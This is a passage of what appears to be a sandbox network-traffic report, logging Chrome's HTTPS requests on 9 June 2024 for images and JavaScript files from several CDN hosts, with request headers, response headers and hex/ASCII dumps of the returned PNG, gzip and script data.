                                                                                                                                                          2024-06-09 22:41:24 UTC4096INData Raw: d4 b4 d3 00 08 c3 bb 1f 95 71 9a 59 19 65 46 0c 44 31 dd 94 d1 8f 27 65 9d 33 b3 8f be 15 cb c1 96 48 bc 96 82 36 db 72 cf cd 8c 95 05 3b 66 bc 98 2b 1d 94 b3 3b 7c 77 ce 15 86 24 8a ab b5 4e a6 08 47 e6 ce ea 32 36 e0 89 49 54 fc 73 ee ab 91 d0 82 20 54 3f 0d f9 55 c8 be 24 19 e4 e4 15 9e 4c d1 14 42 a9 73 7b 70 b3 4d 97 c0 85 52 e1 b6 39 54 c8 ba 24 77 bf 65 59 6a 41 30 e4 20 98 b6 80 a4 88 36 3e d0 00 52 44 09 34 52 18 a4 04 6c 14 aa c9 42 74 5f 51 c8 dc b7 6e 54 a8 de b2 74 59 53 38 13 9e ca 64 5c cb 18 24 6e 31 8d d5 91 29 94 8b 3b 4c 1f 8a a8 6c 4d fb 95 26 e9 15 c1 dc 8e 89 d2 d6 b6 88 9a 03 47 18 59 e5 3b 3b bc 78 1a 1a 3b 63 dc e1 fe 5c a6 6f 8c 4d 0d a6 81 c1 a0 37 60 86 4c d2 5b e1 d2 d6 a4 34 5a 45 a8 37 03 f5 48 9a 42 27 8c bb 67 22 c4 ca 3b
                                                                                                                                                          Data Ascii: qYeFD1'e3H6r;f+;|w$NG26ITs T?U$LBs{pMR9T$weYjA0 6>RD4RlBt_QnTtYS8d\$n1);LlM&GY;;x;c\oM7`L[4ZE7HB'g";
                                                                                                                                                          2024-06-09 22:41:24 UTC4096INData Raw: 81 7b 3d bc 08 89 1c ac 87 59 63 28 ae 76 dc bd c4 8d be 51 64 1e 32 82 ba 99 f1 64 b7 84 9b 1a c6 40 91 e7 27 3d 95 6c ba 0b a1 87 d5 6d ca ac be 22 1d 59 b6 db 04 99 a1 11 2a 2e 1a 49 19 c9 fb aa 49 d1 12 4a d6 bb 93 ea 50 91 17 12 7d 85 cd 2f f3 e5 dd a7 f2 9e d9 57 f1 f1 5a b3 85 ea b9 fb 50 2c 65 b8 82 0b 0f d9 69 d4 e5 45 d9 06 aa b0 e7 24 ee aa 66 ac 71 22 ba a8 38 e9 e4 f6 50 35 c6 24 aa 08 1f 31 cb b8 54 4d d1 bf 0e 3b 1c bd 52 47 25 bd c0 0c 16 ee 16 4c 8e d1 d5 c5 0d 4c 25 7b 8b 1e 73 ff 00 bd d5 51 91 3c c2 a8 1b e6 3b 0f 19 fb ad 50 c8 8c 4e 16 68 2d 6e 14 c4 3f 1b 2d b8 b3 d1 46 6e 36 cb f2 4f a8 95 9b 4b 1e 09 3c 85 d6 e3 e4 b4 79 8f 50 e3 b8 31 ea 39 db c8 e1 6f 84 ce 24 e2 59 d3 cc 22 6e a9 76 6f ba d5 09 19 a5 06 c5 3e e1 e7 c9 86 1c c0
                                                                                                                                                          Data Ascii: {=Yc(vQd2d@'=lm"Y*.IIJP}/WZP,eiE$fq"8P5$1TM;RG%LL%{sQ<;PNh-n?-Fn6OK<yP19o$Y"nvo>
                                                                                                                                                          2024-06-09 22:41:24 UTC4096INData Raw: a5 ca c9 64 82 47 a8 7c 29 ea 3b 9b 62 81 cd a5 c8 20 0c 09 86 c7 f6 59 32 af c9 ce c8 bb 3b df 47 5c ee d5 91 b6 99 94 e1 84 8d dc 64 1d ff 00 45 5c 61 b0 63 c0 f2 dd 7c 1a 6e a6 ba 4f 4b 63 36 f9 e0 2f aa 96 3d 23 0e 05 a3 1b f7 57 5a 89 af 93 91 63 c7 af cb 47 ce 7f f1 37 e9 3e a0 b7 f8 8d 69 f1 12 56 b1 96 1a ba 66 5b 23 00 83 27 9d 0e 5e ed 40 76 c2 ed 7a 64 d3 83 4f c9 e7 db 71 3c d9 05 dc bc 81 ed ca df 45 90 cf 65 b5 35 c0 3d 83 27 65 5b fc 9d 18 64 b2 43 2a c6 70 4e ca 0c ba 32 0d f5 7b 60 70 84 c1 b6 36 2a 83 5d 9e 14 ec 83 63 13 d5 65 d8 ec 9a 65 4e 23 62 af b1 3b 6e 99 5b 88 45 ed 93 d2 fe e9 a9 10 78 ac 79 94 94 c5 a4 80 09 29 ef 44 1f 1d 08 65 91 af 39 69 c0 52 f7 0c b2 e1 a2 43 6c f0 06 8c 9d d2 f7 45 fb 34 7f ff d7 f8 eb af 51 ca fa 2d 9e
                                                                                                                                                          Data Ascii: dG|);b Y2;G\dE\ac|nOKc6/=#WZcG7>iVf[#'^@vzdOq<Ee5='e[dC*pN2{`p6*]ceeN#b;n[Exy)De9iRClE4Q-
                                                                                                                                                          2024-06-09 22:41:24 UTC7212INData Raw: bd d6 c7 e7 03 63 83 a7 95 5b e3 66 f8 33 ca 17 f2 73 c8 3c 78 a0 be f8 87 f8 bb 0d 94 cd d3 a6 a8 34 4b 15 03 88 f2 b5 60 93 b7 b2 ee 2c 69 63 a9 79 a1 e4 c9 15 1a a2 93 eb b3 a8 7a 2a f3 76 e9 fa 6e 96 80 53 5c a0 82 57 56 44 20 30 38 35 ee 1a 09 07 19 4b 80 a5 ab b3 8d 98 e0 6d 91 ce db 38 3e eb 75 99 e8 dc 7d 3f 74 9d 1f 89 7e 34 f4 a7 87 37 49 1d 15 ba f5 74 a4 a1 9e 48 71 e6 36 37 c8 0b 8b 49 db 3b 2c fc bc be d6 29 49 7c 23 77 09 6f 91 47 ed 9f 78 ef 35 f4 5e 1e f4 e5 ba c3 45 39 8e 96 9d 91 50 53 c9 33 db a8 47 0b 03 1b a8 93 be c1 7c ef 1a f7 1f 9f 3d 9e fd ff 00 14 15 9e fd 49 70 86 73 5b 72 64 f0 91 8d e7 60 0d 0e 18 c0 dd 42 71 a2 4b b3 9a f8 93 e0 77 82 1d 48 c9 65 bd 53 f9 f5 24 1c b9 b7 07 34 e4 f3 f9 4a 8a e6 65 c7 d2 74 1f b7 84 bc a3 8c
                                                                                                                                                          Data Ascii: c[f3s<x4K`,icyz*vnS\WVD 085Km8>u}?t~47ItHq67I;,)I|#woGx5^E9PS3G|=Ips[rd`BqKwHeS$4Jet


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          689192.168.2.55047190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC645OUTGET /pc/image-pc/index/125/top/passwd.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 3209
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 02:48:03 GMT
                                                                                                                                                          ETag: "64bf37e3-c89"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE7[2],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063153
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5df793902d11aa65085531a18c1853ee
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528847
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC3209INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 15 00 00 00 15 08 06 00 00 00 a9 17 a5 96 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                          Data Ascii: PNGIHDRgAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          690192.168.2.55047290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC552OUTGET /pc/240516-03/static/js/components/iconSvg.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 760
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-2f8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE1[295],EU-GER-frankfurt-GLOBAL1-CACHE1[292,TCP_MISS,294],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a84e2c77e2f11ca9e30e706c207f0aac
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823401
                                                                                                                                                          X-CCDN-Expires: 768607
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC760INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 47 59 42 64 41 47 67 47 38 41 69 41 52 67 44 63 41 4e 41 4e 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 51 70 4a 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 34 42 50 54 4b 4d 6f 42 39 56 79 43 51 42 5a 46 49 59 34 41 62 45 45 6f 4b 57 69 68 2f 44 68 41 57 41 45 49 41 42 67 42 66 63 54 55 41 5a 53 55 7a 41 48 4e 53 41 43 45 55 46 45 43 6f 4e 44 56 51 78 56 6b 30 41 46 35 79 4e 43 67 41 57 30 6a 4b 46 58 51 41 57 69 52 61 4e 4f 43 49 61 77 67 6b 46 6e 4a 36 74 41 42 68 66 79 67 6b 4c 76 4a 48 57 78 59 55 35 54 51 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          691192.168.2.550469183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC549OUTGET /061410/rcenter/common/js/curl/curl.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC714INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 6150
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-114-12
                                                                                                                                                          ETag: W/"655579c8-47ab"
                                                                                                                                                          Date: Thu, 06 Jun 2024 16:49:26 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 16:49:26 GMT
                                                                                                                                                          Age: 280318
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;yancmp114:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-YANC-MP-114-12
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-14
                                                                                                                                                          X-Cdn-Request-ID: 06281393fb0af479ebda72e89a7f529a
                                                                                                                                                          2024-06-09 22:41:24 UTC6150INData Raw: 1f 8b 08 00 00 00 00 00 00 03 95 3c 6b 73 db 46 92 7f 45 42 a5 74 80 05 53 52 ee cb 16 91 59 95 d7 76 b6 72 95 ac bd b6 77 3f 1c 49 a7 20 62 28 41 86 00 1a 00 f5 58 12 ff fd fa 35 2f 90 52 72 95 8a 38 8f 9e 9e 9e 9e 9e 9e 9e ee 86 e3 d5 a6 5e f6 65 53 c7 d7 55 73 95 57 c9 f6 3e 6f 8f ee 75 db 41 9b 8a ce 27 7f 99 5c 5c 44 e9 72 d3 56 ff c8 ef b4 8a b0 14 a5 85 5e 95 b5 e6 16 2e 47 e9 55 d3 f4 9f 97 6d b9 ee df f4 7d 0b ed 79 9f bf 46 f0 d7 ed a6 f6 bb d3 4d a7 db b7 ab eb 74 dd ea fb b7 00 40 85 77 84 26 2d 9a a5 62 52 26 50 dc dc e9 ba 4f 6f 74 5e 28 a8 9d 9c c4 f0 77 82 d5 dd 0e 4b d7 ba 7f 5f 69 84 e9 fe f6 f4 25 bf 46 82 e2 08 fb a3 64 76 be 48 d2 b2 86 a9 fa bf e9 55 d3 ea f7 95 c2 9e 93 13 fc fb cc d0 ab bc d3 34 74 b7 ab 37 55 95 de 75 d7 ff ea ca
                                                                                                                                                          Data Ascii: <ksFEBtSRYvrw?I b(AX5/Rr8^eSUsW>ouA'\\DrV^.GUm}yFMt@w&-bR&POot^(wK_i%FdvHU4t7Uu


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          692192.168.2.550470183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC564OUTGET /061410/rcenter/common/js/gamebox/common/urlencode.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC654INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 587
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-04-05
                                                                                                                                                          ETag: "655579c8-24b"
                                                                                                                                                          Date: Thu, 06 Jun 2024 16:05:36 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 16:05:36 GMT
                                                                                                                                                          Age: 282948
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xymp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-04-05
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-17
                                                                                                                                                          X-Cdn-Request-ID: 47c699545a6e1e9c7183976a8244f10e
                                                                                                                                                          2024-06-09 22:41:24 UTC587INData Raw: 66 75 6e 63 74 69 6f 6e 20 55 72 6c 45 6e 63 6f 64 65 28 73 74 72 29 7b 76 61 72 20 68 65 78 3d 22 22 3b 76 61 72 20 69 2c 74 3b 66 6f 72 28 69 3d 30 3b 69 3c 73 74 72 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 74 3d 68 65 78 66 72 6f 6d 64 65 63 28 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 29 3b 69 66 28 74 3d 3d 22 32 35 22 29 7b 74 3d 22 22 7d 68 65 78 2b 3d 22 25 22 2b 74 7d 72 65 74 75 72 6e 20 68 65 78 7d 66 75 6e 63 74 69 6f 6e 20 68 65 78 66 72 6f 6d 64 65 63 28 6e 75 6d 29 7b 69 66 28 6e 75 6d 3e 36 35 35 33 35 29 7b 72 65 74 75 72 6e 28 22 65 72 72 21 22 29 7d 66 69 72 73 74 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 75 6d 2f 34 30 39 36 2d 30 2e 35 29 3b 74 65 6d 70 31 3d 6e 75 6d 2d 66 69 72 73 74 2a 34 30 39 36 3b 73 65 63 6f 6e 64 3d 4d 61
                                                                                                                                                          Data Ascii: function UrlEncode(str){var hex="";var i,t;for(i=0;i<str.length;i++){t=hexfromdec(str.charCodeAt(i));if(t=="25"){t=""}hex+="%"+t}return hex}function hexfromdec(num){if(num>65535){return("err!")}first=Math.round(num/4096-0.5);temp1=num-first*4096;second=Ma


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          693192.168.2.55047390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC382OUTGET /pc/image-pc/index/382/service/img_logo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 46260
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:15 GMT
                                                                                                                                                          ETag: "64c0a20b-b4b4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE14[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063147
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 18776d090d12a7d9d6b42dc9e8fe30fb
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528853
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 64 00 00 01 2c 08 06 00 00 00 f4 10 c9 21 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRd,!tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 15 52 27 4d bf f6 e2 45 db 6a ba 59 e1 b2 d5 b4 17 00 8c 34 01 0f 2f 98 f2 8e cc c8 04 12 17 b4 e9 84 97 fd f9 f0 61 7d fb 0f da a2 77 55 36 20 71 a4 00 62 b2 ee 1b 9a 5a a6 49 a6 eb 9d ac 43 86 cc 0c 32 99 67 3a 93 7d 94 25 af 58 b1 36 91 05 8c 15 ef 0a ff 73 11 b6 a7 73 5d a4 ce b2 01 a9 3a 81 d7 51 3d 72 52 6f 92 09 7b 01 9f 1e 37 cd 4e f9 f9 6e e3 49 c7 56 4a e4 1f 47 b6 b8 f5 8e d7 57 a4 d3 a9 55 e5 15 d1 11 5b 8d db 22 42 08 06 b5 ee 6a c7 50 d7 2d 78 0d 1b 7a 0e 40 44 86 06 80 dc 33 00 19 18 c1 00 bc 69 b9 ee a7 f0 26 f4 98 29 1a a0 29 18 a7 b9 f0 91 c7 3e 49 65 d1 8f 2d b9 62 c4 d0 be 3b 3b 39 1f 64 e8 ae a1 e4 a0 30 32 8d 2b 5b 53 19 62 53 33 9c e1 ba 1c 76 9b de fd 20 f8 1c 79 d8 8e 63 7c 18 32 b2 37 df bc 16 d6 c5 7e f7 fd d2 6f 6d 8d d8 df 17
                                                                                                                                                          Data Ascii: R'MEjY4/a}wU6 qbZIC2g:}%X6ss]:Q=rRo{7NnIVJGWU["BjP-xz@D3i&))>Ie-b;;9d02+[SbS3v yc|27~om
                                                                                                                                                          2024-06-09 22:41:24 UTC14109INData Raw: 1e e7 e9 ee de d2 21 9b 93 c9 7b af 15 53 fb cc 4b de ac a8 5d d3 38 6f 64 fe c0 93 df 7c f6 b4 3f b2 a8 6d b2 50 5d c0 76 55 1b 5f 7a 7d c5 ca 63 cf 78 e8 b9 f6 20 eb 90 1d 1a 3a 2d 60 75 72 24 41 07 09 17 75 26 89 3a 94 38 1c d4 0d db 6d 00 23 05 ca 88 13 46 8c c4 a4 64 02 62 a7 94 2c 7e ef 20 b3 8a 88 73 4b d4 c1 43 0c 22 ce 48 c2 bc b8 45 20 26 49 57 6c 95 f0 9a 0b af a8 5c 5e 31 ff 8b ad 16 84 40 98 b8 6d ff f7 ed 47 8f 3b e2 b0 dd 8f 5e b7 a1 a5 ea 4f 7f 7d ef 7e 54 61 04 b1 6e b2 30 d1 85 bc 36 a2 aa 10 ec 38 61 44 3b 1b 1b 9c 5d 4c fc 2a 9e 96 f0 f4 b9 82 57 05 c8 d0 90 df 61 86 ed e3 08 9b ee 79 2f 33 3c f7 ce ef 39 86 6c 0d 5a ad 3f 5e 45 bd f7 44 07 6e 5d bb ae a1 f9 c2 ab 16 3c b8 79 6b c7 e2 3d c7 0c 9d f5 ee bc df 9e c6 a2 e6 53 0d 82 25 83
                                                                                                                                                          Data Ascii: !{SK]8od|?mP]vU_z}cx :-`ur$Au&:8m#Fdb,~ sKC"HE &IWl\^1@mG;^O}~Tan068aD;]L*Way/3<9lZ?^EDn]<yk=S%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          694192.168.2.55047423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC612OUTGET /pc/image-pc/index/382/footer/icon_money.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
